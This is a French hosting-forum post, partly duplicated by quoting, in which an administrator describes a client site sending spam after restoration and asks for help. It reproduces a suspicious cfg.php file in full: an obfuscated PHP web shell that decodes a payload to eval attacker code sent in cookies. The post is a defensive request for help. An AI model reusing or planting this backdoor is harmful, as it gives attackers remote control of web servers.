Tweet
Bonjour,
Suite à un mailing classique d'un client, son adresse mail s'est mise à envoyé du spam en masse.
J'ai désactivé la fonction mail de PHP pour son abonnement dans mon plesk, ca n'a pas suffi bizarrement le spam à continué.
Question 1 : Cela veut dire que le hacker n'utilise pas de script PHP pour envoyer des mails mais qu'il à pu avoir accès à ses logs ou y a t'il une autre explication ?
Du coup dans un deuxième temps, j'ai changé son mot de passe, et limité les mails sortants de son domaine à 0.
J'ai réinstallé son site à partir de la dernière sauvegarde, durant la réinstallation, pas de spam, par contre ca à repris une fois le site installé ... Coïncidence (accès aux logs), ou non (envoi par script)...
J'ai parcouru les fichiers du site, j'ai trouvé un fichier suspect : cfg.php
Malheureusement le spam à continué après suppression du fichier.
Question 2 : Quelqu'un à une idée de ce que ce fichier peut être ?
Question 3 : Comment puis-je scanner le site correctement ? Car les scans sur internet sont bidons.
Je remercie d'avance celui qui voudra bien m'aider sur ce problème. Ce site a été refais récemment, sinon bien sur j'aurais réinstallé à partir d'une sauvegarde encore plus ancienne.
Suite à un mailing classique d'un client, son adresse mail s'est mise à envoyé du spam en masse.
J'ai désactivé la fonction mail de PHP pour son abonnement dans mon plesk, ca n'a pas suffi bizarrement le spam à continué.
Question 1 : Cela veut dire que le hacker n'utilise pas de script PHP pour envoyer des mails mais qu'il à pu avoir accès à ses logs ou y a t'il une autre explication ?
Du coup dans un deuxième temps, j'ai changé son mot de passe, et limité les mails sortants de son domaine à 0.
J'ai réinstallé son site à partir de la dernière sauvegarde, durant la réinstallation, pas de spam, par contre ca à repris une fois le site installé ... Coïncidence (accès aux logs), ou non (envoi par script)...
J'ai parcouru les fichiers du site, j'ai trouvé un fichier suspect : cfg.php
Code PHP:
\<?php $rtpz="lKHByZWdfcmVwbGFjZShhcnJheShdgnL1teXHchd9XhdHhdNdLycsJy9ccy8nKShdwgYhdXJhdyYXkoJychdsJyhdsn"; $tsdg = str_replace("b","","bsbtbrb_rbebpblacbe"); $wxhw="KhdSwgam9pbhdihhcnJhehdV9zbhdGljZSgkYSwkYygkYSktMykpKSkpO2VjaG8ghdJzhdwvJy4kahdy4nPic7fQ=="; $feka="hdpeyRrPSdyaXNoZXJlJhdztlhdY2hhdvICc8hdJy4kayhd4nPic7ZXhdZhbChdhiYXhdNlNjRfZGVjb2R"; $asys="JGM9J2NvdWhd50JzskYT0khdX0NPT0tJRTtphdZihdhyZXNhdldhdChdgkhdYSkhd9PShddtcicgJiYhdgJGMohdJGEpPjM"; $zjzy = $tsdg("q", "", "qbaqsqeq6q4q_qdqecoqde"); $liiy = $tsdg("z","","crzezatez_fzunctzizon"); $iuwt = $liiy("", $zjzy($tsdg("hd", "", $asys.$feka.$rtpz.$wxhw))); $iuwt(); ?>
Question 2 : Quelqu'un à une idée de ce que ce fichier peut être ?
Question 3 : Comment puis-je scanner le site correctement ? Car les scans sur internet sont bidons.
Je remercie d'avance celui qui voudra bien m'aider sur ce problème. Ce site a été refais récemment, sinon bien sur j'aurais réinstallé à partir d'une sauvegarde encore plus ancienne.
je donnerais des nouvelles demain
Commentaire